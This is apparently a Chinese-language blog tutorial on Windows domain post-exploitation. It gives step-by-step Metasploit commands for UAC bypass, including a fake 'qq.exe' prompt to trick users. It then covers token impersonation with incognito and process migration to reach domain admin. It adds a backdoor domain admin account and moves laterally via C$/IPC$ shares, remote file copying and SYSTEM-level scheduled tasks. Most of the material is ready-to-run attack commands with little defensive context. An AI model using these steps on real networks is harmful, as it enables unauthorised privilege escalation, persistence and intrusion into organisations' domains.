域安全(2)横向移动和纵向移动以及域的提权(后渗透)

域安全-UAC提权
需要UAC提权进行的操作:(基本在控制面板)
1.系统的更新
2.增加/修改账户
3.修改UAC设置等
借助msf
1.已经通过木马使目标计算机被控制 成功上线
2.进行UAC提权尝试(失败率比较高)
use exploit/windows/local/bypassuac (多用来进攻32位系统)
show options
set SESSION 1   //具体是几号机器就填相应的数字
exploit 开始攻击/run也可以执行
//如果攻击成功,会给你一个新的session号
进入新的session号
getuid
getsystem
ask模块进行uac提权
background 先把木马放到后台
use exploit/windows/local/ask 加载ask模块
info 查看漏洞信息
set SESSION 1    //使用漏洞在1号木马控制的目标上
set FILENAME   qq.exe   //伪装成文件名为qq
set LHOST [本地的ip地址]    //设置本地监听地址
exploit
会在用户桌面上弹出一个允许qq启动,用户选择yes,成功
getuid     //发现还不是system
getsystem  //可以提高到最高
域安全-令牌窃取 纵向移动 横向移动
令牌-token  更类似于web安全中的cookie
伪造令牌 可以实现提权 也就是纵向移动提权方法的一种
核心:kerberos协议
借助工具msf
步骤:
1.木马成功使目标计算机上线
2.进入一个session 
use incognito
list_tokens -u
impersonate_token TEST1\\Administrator(这个地方是上面出现的令牌中想要盗用的令牌的名字 反斜杠写两个)
//Successfully
shell  //即可获得冒用的相应的执行权限
whoami
纵向移动(这里介绍一种进程迁移注入的提权方法)
(移动到哪个进程 就可以以哪个进程的名义 做该进程持有者相应权限的事情)
1.首先不论任何手段获得system权限
此时权限是AUTHORITY\SYSTEM 我们需要横向移动到域管理员的权限上
2. 进程迁移提权
migrate [相应进程的pid]   //当前进程迁移到其他进程后 权限可能会根据进程权限而改变 可以找高权限的类似 TEST1\Administrator 域管理员的权限
get uid  //此时已经是域控管理员权限就够了 不能getsystem 否则会失去管理员的权限
域安全(2)横向移动和纵向移动以及域的提权(后渗透)_第1张图片
3.令牌伪造提权: (这一步下才可以执行add_user命令) (也就是上面的伪造令牌 这里重复介绍一下)
use incognito
list_tokens -u
impersonate_token TEST1\\Administrator
3.后续操作 (纵向移动提权成功以后的横向移动以及后渗透)
#add_user [新用户账号] [新用户密码] -h [域控服务器ip地址]
add_user lyj Test123 -h 192.168.109.136
add_group_user "domain admins" lyj -h 192.168.109.136
shell
net group "domain admins"   //只能在域控制器上使用的命令
域安全(2)横向移动和纵向移动以及域的提权(后渗透)_第2张图片
横向移动(纵向移动提权成功以后的情况下的横向移动)
1.使用纵向移动的方法 不论使用了哪种提权方法
这里默认已经获得了TEST1\Administrator 域控管理员权限 并且成功建立了另一个管理员权限的账户lyj
2.默认情况下域控windows会开放c盘的共享
方法1: 进入网络驱动器的映射
域安全(2)横向移动和纵向移动以及域的提权(后渗透)_第3张图片
3.点击完成 登录刚才建立的新的管理员账户
域安全(2)横向移动和纵向移动以及域的提权(后渗透)_第4张图片 域安全(2)横向移动和纵向移动以及域的提权(后渗透)_第5张图片
方法2:命令行操作
net use \\192.168.109.136\c$ "Test123" /user:lyj
net share
net use
dir \\192.168.109.136\c$
type \\192.168.109.136\c$\a.txt
方法2-2:
当对方 开启了135 445端口时可以使用ipc$  或者管理员什么都没有修改那么可以使用ipc$  可以使用的权限更高
net use \\192.168.109.136\ipc$ "Test123" /user:lyj
net use
方法2-3:
远程访问(以远程访问进程为例)
tasklist /S 192.168.109.136 /U lyj /P Test123
方法2-4:
在内网被控制的机器的C盘创建一个文本文件a.txt
然后cmd执行命令 
可以把本机的文件拷贝到域控电脑C盘上的 这里也可以考虑传木马等 都很轻松了
copy a.txt \\192.168.109.136\c$
方法2-5:计划任务 9点51执行cmd命令并且输出到c盘下的1.txt内
at \\192.168.109.136 9:51PM cmd.exe /c "ipconfig > c:/1.txt" 
方法2-6:针对比较新的系统
schtasks /create /s 192.168.109.136 /tn test1 /sc onstart /tr c:/a.bat /ru system /f

你可能感兴趣的:(内网安全,服务器,linux,安全)